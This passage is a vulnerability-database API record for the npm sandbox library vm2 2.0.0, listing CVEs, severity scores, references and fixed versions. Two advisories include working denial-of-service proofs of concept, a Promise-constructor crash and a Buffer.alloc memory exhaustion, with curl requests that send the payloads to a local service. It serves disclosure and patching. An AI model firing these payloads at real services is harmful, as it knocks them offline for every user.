{"url":"http://public2.vulnerablecode.io/api/packages/538473?format=json","purl":"pkg:npm/vm2@2.0.0","type":"npm","namespace":"","name":"vm2","version":"2.0.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.11.4","latest_non_vulnerable_version":"3.11.4","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109601?format=json","vulnerability_id":"VCID-1p1e-z4rv-1bfn","summary":"vm2 vulnerable to Arbitrary Code Execution\nThe package vm2 before 3.9.10 is vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25893","reference_id":"","reference_type":"","scores":[{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66103","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66137","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.6615","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66165","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00495","scoring_system":"epss","scoring_elements":"0.66155","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25893"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/issues/444","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"C
VSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/444"},{"reference_url":"https://github.com/patriksimek/vm2/pull/445","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/pull/445"},{"reference_url":"https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25893","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25893"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-VM2-2990237","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.snyk.io/vuln/SNYK-JS-VM2-2990237"},{"reference_url":"https://github.com/advisories/GHSA-4w2j-2rg4-5mjw","reference_id":"GHSA-4w2j-2rg4-5mjw","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4w2j-2rg4-5mjw"}],"fixed_packages":[{
"url":"http://public2.vulnerablecode.io/api/packages/146724?format=json","purl":"pkg:npm/vm2@3.9.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.10"}],"aliases":["CVE-2022-25893","GHSA-4w2j-2rg4-5mjw"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p1e-z4rv-1bfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92081?format=json","vulnerability_id":"VCID-3krt-qmqx-q7c6","summary":"vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)\n### Summary\nA sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. 
The fix for CVE-2026-22709 (v3.10.2) only sanitized the `onRejected` callback in `.then()` and `.catch()` overrides and did not address the executor-to-unhandledRejection path.\n\n### Details\nWhen sandboxed code creates a `Promise` whose executor sets `Error.name` to a `Symbol()` and then accesses `.stack`, V8's internal `FormatStackTrace` (C++) attempts `Symbol.toString()`, which throws a **host-realm TypeError**. Because this error originates inside the Promise executor and no `.catch()` handler is attached, it becomes an **unhandled rejection** that propagates to the host process.\n\n- `lib/setup-sandbox.js:38` — `localPromise` wraps the native `Promise` constructor but does not wrap the executor in try-catch.\n- `lib/setup-sandbox.js:165-230` — `resetPromiseSpecies` and the `.then()`/`.catch()` overrides sanitize the `onRejected` callback chains, but do not intercept unhandled rejections originating from the executor itself.\n\nThe CVE-2026-22709 patch (v3.10.2) sanitized `.then()` and `.catch()` callback chains but left the executor-to-unhandledRejection path completely open.\n\n**Root Cause**: Promise executor errors are not caught/sanitized before they can propagate as unhandled rejections to the host process, causing an immediate process crash.\n\n**`allowAsync: false` does not help**: This setting only blocks `async`/`await` syntax and overrides `.then()`/`.catch()` to throw. The `Promise` constructor itself is still callable. 
Worse, because `.catch()` is blocked, any rejection from the executor is *guaranteed* to be unhandled — making `allowAsync: false` paradoxically more dangerous than `true` for this vulnerability.\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\n\n// Works with ANY allowAsync setting — both true and false\nconst vm = new VM({ timeout: 5000, allowAsync: false });\n\ntry {\n  const result = vm.run(`\n    new Promise(function(r, j) {\n      var e = new Error();\n      e.name = Symbol();\n      e.stack;\n    });\n  `);\n  console.log(\"Result:\", result);   // Reaches here (returns Promise object)\n} catch (err) {\n  console.log(\"Caught:\", err);       // Never executed\n}\n\nconsole.log(\"After try-catch\");      // Also prints normally\n\n// But on the next microtask tick:\n// [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string]\n// Exit code: 1\n//\n// try-catch cannot help — vm.run() returns synchronously,\n// the rejection fires asynchronously outside any catch scope.\n//\n// NOTE: allowAsync: false only blocks async/await syntax and\n// .then()/.catch() method calls. The Promise constructor itself\n// still executes, and the unhandled rejection still propagates.\n// In fact, allowAsync: false makes it WORSE — .catch() is blocked,\n// so the rejection is guaranteed to be unhandled.\n```\n\n**HTTP demonstration (web service impact):**\n```bash\n# 1. Confirm server is running\ncurl -s http://localhost:3000/api/execute \\\n  -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"\\\"alive\\\"\"}'\n# => {\"output\":[],\"errors\":[],\"result\":\"\\\"alive\\\"\",\"executionTime\":1}\n\n# 2. Send payload — server process will crash\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})\"}'\n\n# 3. 
Server is dead (connection refused until restart)\ncurl -s http://localhost:3000/  # => connection refused\n```\n\n### Impact\n- **DoS**: A single request crashes the entire host Node.js process. All concurrent users lose service immediately. In Node.js 15+, unhandled rejections terminate the process by default — no special configuration is required for the crash to occur.\n- **Persistent DoS despite restart policies**: Even when container orchestration (Docker restart policy, Kubernetes liveness probes, PM2, etc.) automatically restarts the crashed process, an attacker can send repeated requests to crash the process again before it fully recovers. In our testing, a single `curl` request caused the Docker container to restart (confirmed via `StartedAt` timestamp change), and sending the next request immediately after restart triggered another crash. This creates a **continuous denial-of-service loop** where the service never becomes available to legitimate users — each restart is met with another crash before any real request can be served.\n- **Amplification**: A single HTTP request (~150 bytes) terminates the entire host process serving all users. The cost to the attacker is negligible compared to the impact.\n- **Scope**: **All applications using vm2, regardless of `allowAsync` setting.** `allowAsync: false` only blocks `async`/`await` syntax and `.then()`/`.catch()` method calls — the `Promise` constructor itself still executes, and the unhandled rejection still propagates. 
In fact, `allowAsync: false` makes the vulnerability *worse* because `.catch()` is blocked, guaranteeing the rejection is always unhandled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44001","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16727","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16663","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16646","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16768","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16764","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44001"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"val
ue":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:16:50Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44001","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44001"},{"reference_url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8"},{"reference_url":"https://github.com/advisories/GHSA-hw58-p9xv-2mjh","reference_id":"GHSA-hw58-p9xv-2mjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hw58-p9xv-2mjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44001","GHSA-hw58-p9xv-2mjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3krt-qmqx-q7c6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44872?format=json","vulnerability_id":"VCID-4dwc-b66t-cuf8","summary":"Improper Control of Dynamically-Managed Code 
Resources\nvm2 is a sandbox that can run untrusted code with allow-listed Node built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29017.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29017.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29017","reference_id":"","reference_type":"","scores":[{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.98891","published_at":"2026-06-05T12:55:00Z"},{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.98889","published_at":"2026-06-09T12:55:00Z"},{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.9889","published_at":"2026-06-08T12:55:00Z"},{"value":"0.74958","scoring_system":"epss","scoring_elements":"0.98892","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29017"},{"reference_url":"https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":
"https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50"},{"reference_url":"https://github.com/patriksimek/vm2/issues/515","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://github.com/patriksimek/vm2/issues/515"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2185374","reference_id":"2185374","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2185374"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29017","reference_id":"CVE-2023-29017","reference_type":"","scores":[{"value":"9.8","scoring_syst
em":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29017"},{"reference_url":"https://github.com/advisories/GHSA-7jxr-cg7f-gpgv","reference_id":"GHSA-7jxr-cg7f-gpgv","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jxr-cg7f-gpgv"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv","reference_id":"GHSA-7jxr-cg7f-gpgv","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-10T16:10:48Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64547?format=json","purl":"pkg:npm/vm2@3.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"
vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.15"}],"aliases":["CVE-2023-29017","GHSA-7jxr-cg7f-gpgv"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4dwc-b66t-cuf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94882?format=json","vulnerability_id":"VCID-4w6q-km6k-5bct","summary":"vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion\n### Summary\nSandboxed code can call `Buffer.alloc()` with an arbitrary size to allocate memory directly on the host heap. Because `Buffer.alloc` is a synchronous C++ native call, vm2's `timeout` option cannot interrupt it. A single request can exhaust host memory and crash the process with a `FATAL ERROR: Reached heap limit`.\n\n### Details\nIn `lib/vm.js:58`, `Buffer` is exposed to the sandbox through the `HOST` object. The bridge proxy (`lib/bridge.js`) passes `Buffer.alloc()` calls to the host without any size validation.\n\nKey technical distinction from regular JavaScript memory exhaustion (e.g., `while(true) a.push(...)`):\n- **JavaScript loops**: V8 can interrupt via timeout — vm2's `timeout` option works\n- **`Buffer.alloc(N)`**: Executes as a single synchronous C++ call — V8 timeout has no opportunity to interrupt\n\nThis means:\n1. `timeout: 5000` does NOT protect against this attack\n2. A single call allocates the entire requested size at once\n3. 
In memory-constrained environments (Docker, Lambda, Kubernetes pods), this causes immediate OOM crash\n\nTested amplification factor: ~100 bytes HTTP request — 1,000,000:1 or greater (100 bytes request to 100MB+ host heap allocation).\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM({ timeout: 5000 });\n\n// Buffer.alloc bypasses timeout — allocates 100MB on host heap\nconst result = vm.run(`Buffer.alloc(1024*1024*100).length`);\nconsole.log(result); // 104857600 — timeout had no effect\n\n// Control test — JavaScript loop IS caught by timeout\ntry {\n  vm.run(`var a=[]; while(true) a.push(1)`);\n} catch(e) {\n  console.log(e.message); // \"Script execution timed out after 5000ms\"\n}\n```\n\n**HTTP demonstration (OOM crash):**\n```bash\n# 1. Confirm server is running\ncurl -s http://localhost:3000/api/execute \\\n  -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"\\\"alive\\\"\"}'\n# => {\"result\":\"\\\"alive\\\"\"}\n\n# 2. Send Buffer.alloc payload — process crashes with OOM\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"Buffer.alloc(1024*1024*100).length\"}'\n# => empty response (process died)\n\n# 3. Check server logs:\n# FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n\n# Control test — JavaScript loop IS caught by timeout:\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"var a=[]; while(true) a.push(1)\"}'\n# => {\"errors\":[\"Script execution timed out after 5000ms\"]}\n# Server stays alive — timeout works for JS, but NOT for Buffer.alloc\n```\n\n### Impact\n- **DoS**: A single HTTP request crashes the host Node.js process via OOM. 
The `timeout` option provides no protection.\n- **Environment-dependent severity**:\n  - **Memory-constrained environments** (Docker with memory limits, Kubernetes pods, Lambda): The allocation exceeds the memory limit, causing immediate process termination via OOM. This is the primary threat scenario — `FATAL ERROR: Reached heap limit` was confirmed in testing.\n  - **Unconstrained environments**: The allocation succeeds and memory is reclaimed by GC after the request completes, resulting in temporary performance degradation rather than a crash.\n- **Scope**: All applications using vm2. Default configuration is vulnerable. Memory-constrained environments (Docker, Kubernetes, Lambda) are most severely impacted.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44004","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16727","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16663","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16646","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16768","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16764","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44004"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.
1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T18:07:58Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44004","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44004"},{"reference_url":"https://github.com/advisories/GHSA-6785-pvv7-mvg7","reference_id":"GHSA-6785-pvv7-mvg7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6785-pvv7-mvg7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44004","GHSA-6785-pvv7-mvg7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/
VCID-4w6q-km6k-5bct"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45182?format=json","vulnerability_id":"VCID-75hb-ytcw-4khu","summary":"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\nvm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node `inspect` method and edit options for `console.log`. As a result a threat actor can edit options for the `console.log` command. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. Users unable to upgrade may make the `inspect` method readonly with `vm.readonly(inspect)` after creating a 